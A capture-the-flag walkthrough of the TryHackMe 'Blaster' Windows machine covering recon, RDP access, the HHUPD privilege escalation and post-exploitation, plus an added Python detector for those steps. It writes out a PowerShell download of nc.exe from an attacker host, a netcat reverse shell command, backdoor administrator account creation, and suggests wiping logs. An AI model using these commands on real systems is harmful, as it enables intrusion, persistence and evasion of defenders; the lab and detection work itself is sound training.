TryHackMe "Blaster" Windows Challenge Without Metasploit - Privesc Edition


Blaster is one of the more fun machines I've done lately from TryHackMe.  DarkStar has built a machine that has one of the coolest exploits I've seen in a while, and it makes you scratch your head wondering how the person who discovered it actually discovered it.  The steps in the room were modified to include an exploitation path I suggested via the Metasploit web_delivery module, however this guide will use a separate method that doesn't include using Metasploit.  Blaster is a FREE room, and you can get checked in over at https://tryhackme.com/room/blaster. Once you've done that, we can get started.

Scanning

Conducting our quick Nmap scan of the machine (remember to use the -Pn flag here as it doesn't respond to pings) shows that only a couple of ports are open.

nmap -Pn 10.10.205.59

So we have a web server and remote desktop running.  Let's get some more information using the -A scan.
nmap -A -Pn 10.10.205.59 -p80,3389

So as we can see, there isn't a whole lot going on.  If you are following the room, you can answer question #1 at this point.  Port 80 returns some information about the underlying web server, which we can use to glean the answer to #2.

Enumeration

When we head to the address, however, we notice that all we get is a default IIS web server page, which isn't exactly what we expected.  However, we can run Gobuster to see if we can locate any subdirectories.  This turns out to be successful.
./gobuster dir -u 10.10.205.59 -w /root/Desktop/directories/directory-list-lowercase-2.3-small.txt -t 100

We are able to locate the /retro directory, which we can use to answer #3.  We can then check out that page on the website, which we find is a page for "Retro Fanatics" (which is actually a really cool page for this project - great job!).  Right away we are met with what could be the answer to #4.  Enter it and see if it works.

Retro Fanatics webpage

If we read through the page we can catch some blasts from the past about video games, as well as a clue about a possible password to use with the name we found. 
Possible Clue for User Password

If we use our Google Fu, we can determine the name of the person he has a connection to.  This could be the possible password.  Enter it into Question #5 and see.

Character Name

Exploitation

As you can see, this character was the correct answer.  We can now use the username and password we have discovered to log in to the machine using Remote Desktop.  I used xfreerdp in this instance, however you can use whichever method you prefer.
xfreerdp /u:redacted /p:redacted /v:10.10.205.59

Successfully Logged In

Now that we are logged in we can see the user.txt flag on the Desktop.  Open that and grab the answer to #6.
user.txt flag on Desktop

We can now move on to Task 3 in the room, which first suggests that we should check out the machine to see if we can find any information about what they were doing.  If we poke around in the browser's history we can grab the answer to #1.

User's browser history

Additionally, we could see before that there was something in the recycling bin.  Let's check that out.
Recycling Bin contents

We can drag the contents to the Desktop to use them, as well as answer question #2.  Researching the combination of the CVE we found in the history and HHUPD, we can determine that there is a really interesting exploit we can use to elevate our privileges to administrator.  It will be easier to follow along via pictures.  Where you see a red box, you should click that link with your mouse and follow the next image.  Start by double clicking HHUPD to run it.

Click Show more details

Click Show information about the publisher's certificate


Click VeriSign Commercial Software Publishers CA

What is going on here is that there is a vulnerability in the software where it runs using system privileges.  When you are clicking these links, it is as if the system authority is performing the action.  When you click the certificate link above, it is actually the system authority that opens the browser.  Click OK and exit out of everything, and you will see an Internet Explorer window open up.  Press "Alt" to make the program menu bar appear, and click Save as...
Clicking save as

Clicking save as will show you an error message that says the location is not available.  This is expected, and you can ignore it by pressing ok.
Expected error message

This is the moment my mind was absolutely blown.  If you enter cmd.exe in the address bar of the Save as window, you are able to open a command prompt, which is actually running as the system authority.

Enter cmd.exe in the address bar

whoami nt authority\system

If you would like, you can navigate to the C:\Users\Administrator\Desktop directory and grab the root.txt flag.

root.txt flag on the Administrator's Desktop
At this point in the challenge you should be on Task 4, where you will be asked to use the Metasploit module "web_delivery."  By setting the target to 2 (set target 2), as well as using the windows/meterpreter/reverse_tcp payload, you are able to grab a reverse shell by copying the output from the exploit into your elevated command prompt and running it.  As this is a no-Metasploit version of the Room, this is where I will leave you to successfully gain control of the machine.

If your goal was to grab flags and complete the challenge, congratulations!  You're there.  However, as post-exploitation is something typically ignored in CTF events, I am including these in my guides from now on.  If you are not interested, thanks for stopping in, I hope my guide has been helpful, and I'll see you next time!  If you are interested, please continue reading on.

Post Exploitation

Post-exploitation persistence and control of this machine is pretty straightforward.  The machine itself is running Windows Defender, which won't allow us to upload any payloads to the machine outright.  However, what we can do is add users if we choose, as well as transfer a Netcat binary to the machine to give us local control.

Left - powershell -c wget "http://10.11.1.198:8080/nc.exe" -outfile "nc.exe" Right - python -m SimpleHTTPServer 8080

Right - nc -nlvp 4444 ; Left - nc.exe 10.11.1.198 4444 -e cmd.exe

Let's get a new user created and add them to the Administrators group, giving us full control of the machine, working around our lack of a password for the Administrator account, and allowing us to RDP in with our own account.
net user themayor passredacted /add ; net localgroup "Administrators" themayor /add ; net users to confirm
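As an added example (not part of the original write-up), here is a small Python detection pass over constructed Security-log-style events that flags the privilege escalation and post-exploitation steps covered above: a browser running as SYSTEM spawning cmd.exe, the PowerShell download of nc.exe, nc.exe launched with -e, a new local user, and that user being added to Administrators. The event field names are simplified assumptions rather than real Windows event XML, and the host and user names are constructed.

```python
"""Constructed-event detection for the Blaster privesc and post-exploitation chain.
Field names are simplified assumptions modelled on Security log IDs 4688/4720/4732."""
from typing import Dict, List

Event = Dict[str, str]

# Constructed sample events (not real logs); HOST\user1 is a placeholder account.
SAMPLE_EVENTS: List[Event] = [
    {"id": "4688", "user": "NT AUTHORITY\\SYSTEM", "image": "cmd.exe",
     "parent": "iexplore.exe", "cmdline": "cmd.exe"},
    {"id": "4688", "user": "HOST\\user1", "image": "powershell.exe", "parent": "cmd.exe",
     "cmdline": 'powershell -c wget "http://10.11.1.198:8080/nc.exe" -outfile "nc.exe"'},
    {"id": "4688", "user": "NT AUTHORITY\\SYSTEM", "image": "nc.exe", "parent": "cmd.exe",
     "cmdline": "nc.exe 10.11.1.198 4444 -e cmd.exe"},
    {"id": "4720", "user": "NT AUTHORITY\\SYSTEM", "target": "themayor"},
    {"id": "4732", "user": "NT AUTHORITY\\SYSTEM", "target": "themayor", "group": "Administrators"},
    {"id": "4688", "user": "HOST\\user1", "image": "notepad.exe", "parent": "explorer.exe",
     "cmdline": "notepad.exe user.txt"},  # benign: must not alert
]

BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}


def classify(e: Event) -> str:
    """Return a short alert label for a suspicious event, or "" if it looks benign."""
    eid, cmd = e.get("id"), e.get("cmdline", "").lower()
    if eid == "4688":
        # A browser should never run as SYSTEM; a child of one is the HHUPD-style escalation.
        if e.get("user", "").upper() == "NT AUTHORITY\\SYSTEM" and e.get("parent", "").lower() in BROWSERS:
            return "browser running as SYSTEM spawned " + e.get("image", "?")
        # PowerShell fetching a file over HTTP to disk (wget/Invoke-WebRequest -OutFile, DownloadFile).
        if "powershell" in cmd and "http" in cmd and ("-outfile" in cmd or "downloadfile" in cmd):
            return "PowerShell download cradle: " + cmd
        # Netcat with -e hands a shell to a remote listener.
        if e.get("image", "").lower() == "nc.exe" and " -e " in cmd:
            return "netcat launched with -e (likely reverse shell)"
    elif eid == "4720":
        return "local account created: " + e.get("target", "?")
    elif eid == "4732" and e.get("group", "").lower() in PRIVILEGED_GROUPS:
        return f"{e.get('target', '?')} added to {e.get('group')}"
    return ""


def detect(events: List[Event]) -> List[str]:
    """Run classify over every event and keep only the alerts, in log order."""
    return [label for label in (classify(e) for e in events) if label]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print("ALERT:", alert)
```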

Now that we have ensured persistence on the machine, we can use our new account to log in ourselves.  I used xfreerdp, but you can use whatever you would like.
Desktop access via xfreerdp and Server Manager control

We now have complete control of the machine and the server manager environment.  We can quickly confirm this by going to Tools -> Computer Management and clicking on Local Users and Groups.  We will see that we are in the Administrators group.  This would be game over for a real world engagement, and we would need to review our rules of engagement to consider our next steps and most likely contact our client to inform them of the critical nature of the exploit.

Our user in the Administrators group

If we were in a Red Team type engagement, and had somehow not been identified yet by the security team, we could change the Administrator's password, log back in with that account, and conduct cleanup operations in the logs to erase our tracks.  I encourage you to take this path on your own and see how much you can learn by manipulating these privileges and logs.

Final Thoughts

Overall Blaster is an incredibly great machine with an awesome path to system authority.  Privilege escalation came naturally with the exploit this time around, however our post-exploitation tasks are up to us.  I hope this guide has helped you out with Blaster and given you a better understanding of post exploitation, and I will see you again soon!  
